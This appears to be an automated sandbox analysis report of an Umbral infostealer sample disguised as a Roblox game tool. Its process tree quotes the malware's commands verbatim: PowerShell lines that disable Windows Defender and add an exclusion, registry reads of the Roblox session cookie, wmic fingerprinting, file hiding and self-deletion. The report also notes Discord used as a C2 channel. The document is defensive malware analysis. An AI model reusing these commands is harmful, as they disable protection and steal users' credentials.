Analysis
-
max time kernel
120s -
max time network
120s -
platform
windows7_x64 -
resource
win7-20240419-en -
resource tags
arch:x64arch:x86image:win7-20240419-enlocale:en-usos:windows7-x64system -
submitted
10-05-2024 15:12
Behavioral task
behavioral1
Sample
RagdollEnginess1.exe
Resource
win7-20240419-en
General
-
Target
RagdollEnginess1.exe
-
Size
231KB
-
MD5
513fd7524bb2fbd7e8d0bbbf77e19364
-
SHA1
64df582eeda76d3eebc44d6bae356d56bbf6207d
-
SHA256
3d7e2a98ff098b5b4077ae120139bde751bdbdf9f1fb0adab59e76798e3b0159
-
SHA512
c67a7552d2e50455ac81dabf91dea56a112c2fbee6968a40dd8022a454bcac874c640548aa87f6ad2e3a940f2febab822a5de61ef43bcca51e09c938d4b60d26
-
SSDEEP
6144:xloZM+rIkd8g+EtXHkv/iD4A8G0PlO2Zuc1niinqfAtxjq8e1m3+i:DoZtL+EP8AR0PlO2Zuc1niin6QxMEz
Malware Config
Signatures
-
Detect Umbral payload 1 IoCs
resource yara_rule behavioral1/memory/2372-1-0x00000000010F0000-0x0000000001130000-memory.dmp family_umbral -
Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs
Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.
pid Process 2816 powershell.exe -
Drops file in Drivers directory 1 IoCs
description ioc Process File opened for modification C:\Windows\System32\drivers\etc\hosts RagdollEnginess1.exe -
Deletes itself 1 IoCs
pid Process 2036 cmd.exe -
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
flow ioc 7 discord.com 8 discord.com -
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 4 ip-api.com -
Detects videocard installed 1 TTPs 1 IoCs
Uses WMIC.exe to determine videocard installed.
pid Process 2560 wmic.exe -
Runs ping.exe 1 TTPs 1 IoCs
pid Process 2848 PING.EXE -
Suspicious behavior: EnumeratesProcesses 6 IoCs
pid Process 2372 RagdollEnginess1.exe 2816 powershell.exe 2704 powershell.exe 2156 powershell.exe 2864 powershell.exe 2696 powershell.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
description pid Process Token: SeDebugPrivilege 2372 RagdollEnginess1.exe Token: SeIncreaseQuotaPrivilege 2344 wmic.exe Token: SeSecurityPrivilege 2344 wmic.exe Token: SeTakeOwnershipPrivilege 2344 wmic.exe Token: SeLoadDriverPrivilege 2344 wmic.exe Token: SeSystemProfilePrivilege 2344 wmic.exe Token: SeSystemtimePrivilege 2344 wmic.exe Token: SeProfSingleProcessPrivilege 2344 wmic.exe Token: SeIncBasePriorityPrivilege 2344 wmic.exe Token: SeCreatePagefilePrivilege 2344 wmic.exe Token: SeBackupPrivilege 2344 wmic.exe Token: SeRestorePrivilege 2344 wmic.exe Token: SeShutdownPrivilege 2344 wmic.exe Token: SeDebugPrivilege 2344 wmic.exe Token: SeSystemEnvironmentPrivilege 2344 wmic.exe Token: SeRemoteShutdownPrivilege 2344 wmic.exe Token: SeUndockPrivilege 2344 wmic.exe Token: SeManageVolumePrivilege 2344 wmic.exe Token: 33 2344 wmic.exe Token: 34 2344 wmic.exe Token: 35 2344 wmic.exe Token: SeIncreaseQuotaPrivilege 2344 wmic.exe Token: SeSecurityPrivilege 2344 wmic.exe Token: SeTakeOwnershipPrivilege 2344 wmic.exe Token: SeLoadDriverPrivilege 2344 wmic.exe Token: SeSystemProfilePrivilege 2344 wmic.exe Token: SeSystemtimePrivilege 2344 wmic.exe Token: SeProfSingleProcessPrivilege 2344 wmic.exe Token: SeIncBasePriorityPrivilege 2344 wmic.exe Token: SeCreatePagefilePrivilege 2344 wmic.exe Token: SeBackupPrivilege 2344 wmic.exe Token: SeRestorePrivilege 2344 wmic.exe Token: SeShutdownPrivilege 2344 wmic.exe Token: SeDebugPrivilege 2344 wmic.exe Token: SeSystemEnvironmentPrivilege 2344 wmic.exe Token: SeRemoteShutdownPrivilege 2344 wmic.exe Token: SeUndockPrivilege 2344 wmic.exe Token: SeManageVolumePrivilege 2344 wmic.exe Token: 33 2344 wmic.exe Token: 34 2344 wmic.exe Token: 35 2344 wmic.exe Token: SeDebugPrivilege 2816 powershell.exe Token: SeDebugPrivilege 2704 powershell.exe Token: SeDebugPrivilege 2156 powershell.exe Token: SeDebugPrivilege 2864 powershell.exe Token: SeIncreaseQuotaPrivilege 1684 wmic.exe Token: SeSecurityPrivilege 1684 wmic.exe Token: SeTakeOwnershipPrivilege 1684 wmic.exe Token: SeLoadDriverPrivilege 1684 wmic.exe Token: SeSystemProfilePrivilege 1684 wmic.exe Token: SeSystemtimePrivilege 1684 wmic.exe Token: SeProfSingleProcessPrivilege 1684 wmic.exe Token: SeIncBasePriorityPrivilege 1684 wmic.exe Token: SeCreatePagefilePrivilege 1684 wmic.exe Token: SeBackupPrivilege 1684 wmic.exe Token: SeRestorePrivilege 1684 wmic.exe Token: SeShutdownPrivilege 1684 wmic.exe Token: SeDebugPrivilege 1684 wmic.exe Token: SeSystemEnvironmentPrivilege 1684 wmic.exe Token: SeRemoteShutdownPrivilege 1684 wmic.exe Token: SeUndockPrivilege 1684 wmic.exe Token: SeManageVolumePrivilege 1684 wmic.exe Token: 33 1684 wmic.exe Token: 34 1684 wmic.exe -
Suspicious use of WriteProcessMemory 39 IoCs
description pid Process procid_target PID 2372 wrote to memory of 2344 2372 RagdollEnginess1.exe 28 PID 2372 wrote to memory of 2344 2372 RagdollEnginess1.exe 28 PID 2372 wrote to memory of 2344 2372 RagdollEnginess1.exe 28 PID 2372 wrote to memory of 2676 2372 RagdollEnginess1.exe 31 PID 2372 wrote to memory of 2676 2372 RagdollEnginess1.exe 31 PID 2372 wrote to memory of 2676 2372 RagdollEnginess1.exe 31 PID 2372 wrote to memory of 2816 2372 RagdollEnginess1.exe 33 PID 2372 wrote to memory of 2816 2372 RagdollEnginess1.exe 33 PID 2372 wrote to memory of 2816 2372 RagdollEnginess1.exe 33 PID 2372 wrote to memory of 2704 2372 RagdollEnginess1.exe 35 PID 2372 wrote to memory of 2704 2372 RagdollEnginess1.exe 35 PID 2372 wrote to memory of 2704 2372 RagdollEnginess1.exe 35 PID 2372 wrote to memory of 2156 2372 RagdollEnginess1.exe 37 PID 2372 wrote to memory of 2156 2372 RagdollEnginess1.exe 37 PID 2372 wrote to memory of 2156 2372 RagdollEnginess1.exe 37 PID 2372 wrote to memory of 2864 2372 RagdollEnginess1.exe 39 PID 2372 wrote to memory of 2864 2372 RagdollEnginess1.exe 39 PID 2372 wrote to memory of 2864 2372 RagdollEnginess1.exe 39 PID 2372 wrote to memory of 1684 2372 RagdollEnginess1.exe 41 PID 2372 wrote to memory of 1684 2372 RagdollEnginess1.exe 41 PID 2372 wrote to memory of 1684 2372 RagdollEnginess1.exe 41 PID 2372 wrote to memory of 2580 2372 RagdollEnginess1.exe 43 PID 2372 wrote to memory of 2580 2372 RagdollEnginess1.exe 43 PID 2372 wrote to memory of 2580 2372 RagdollEnginess1.exe 43 PID 2372 wrote to memory of 1836 2372 RagdollEnginess1.exe 45 PID 2372 wrote to memory of 1836 2372 RagdollEnginess1.exe 45 PID 2372 wrote to memory of 1836 2372 RagdollEnginess1.exe 45 PID 2372 wrote to memory of 2696 2372 RagdollEnginess1.exe 47 PID 2372 wrote to memory of 2696 2372 RagdollEnginess1.exe 47 PID 2372 wrote to memory of 2696 2372 RagdollEnginess1.exe 47 PID 2372 wrote to memory of 2560 2372 RagdollEnginess1.exe 49 PID 2372 wrote to memory of 2560 2372 RagdollEnginess1.exe 49 PID 2372 wrote to memory of 2560 2372 RagdollEnginess1.exe 49 PID 2372 wrote to memory of 2036 2372 RagdollEnginess1.exe 51 PID 2372 wrote to memory of 2036 2372 RagdollEnginess1.exe 51 PID 2372 wrote to memory of 2036 2372 RagdollEnginess1.exe 51 PID 2036 wrote to memory of 2848 2036 cmd.exe 53 PID 2036 wrote to memory of 2848 2036 cmd.exe 53 PID 2036 wrote to memory of 2848 2036 cmd.exe 53 -
Views/modifies file attributes 1 TTPs 1 IoCs
pid Process 2676 attrib.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\RagdollEnginess1.exe"C:\Users\Admin\AppData\Local\Temp\RagdollEnginess1.exe"1⤵
- Drops file in Drivers directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2372 -
C:\Windows\System32\Wbem\wmic.exe"wmic.exe" csproduct get uuid2⤵
- Suspicious use of AdjustPrivilegeToken
PID:2344
-
-
C:\Windows\system32\attrib.exe"attrib.exe" +h +s "C:\Users\Admin\AppData\Local\Temp\RagdollEnginess1.exe"2⤵
- Views/modifies file attributes
PID:2676
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\RagdollEnginess1.exe'2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2816
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 22⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2704
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2156
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" Get-ItemPropertyValue -Path HKLN:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2864
-
-
C:\Windows\System32\Wbem\wmic.exe"wmic.exe" os get Caption2⤵
- Suspicious use of AdjustPrivilegeToken
PID:1684
-
-
C:\Windows\System32\Wbem\wmic.exe"wmic.exe" computersystem get totalphysicalmemory2⤵PID:2580
-
-
C:\Windows\System32\Wbem\wmic.exe"wmic.exe" csproduct get uuid2⤵PID:1836
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER2⤵
- Suspicious behavior: EnumeratesProcesses
PID:2696
-
-
C:\Windows\System32\Wbem\wmic.exe"wmic" path win32_VideoController get name2⤵
- Detects videocard installed
PID:2560
-
-
C:\Windows\system32\cmd.exe"cmd.exe" /c ping localhost && del /F /A h "C:\Users\Admin\AppData\Local\Temp\RagdollEnginess1.exe" && pause2⤵
- Deletes itself
- Suspicious use of WriteProcessMemory
PID:2036 -
C:\Windows\system32\PING.EXEping localhost3⤵
- Runs ping.exe
PID:2848
-
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
Filesize7KB
MD54c2b3c1989c88912465d10cafdc41af2
SHA1cd5ecd4cb5b0a85bc2ad60d28de68a392e798b69
SHA256c694cf5de8448924e5a40f58ff8feb0f82d758ceaf4c77f5536afdf0267a3340
SHA512f2238bf4cc585ba516cb708c69f03f3d867b64c39f3be5739e282685552e3d5d6069edfe959f6d1dab985432bce80935f465c6eaef574a1184251b0b8420f837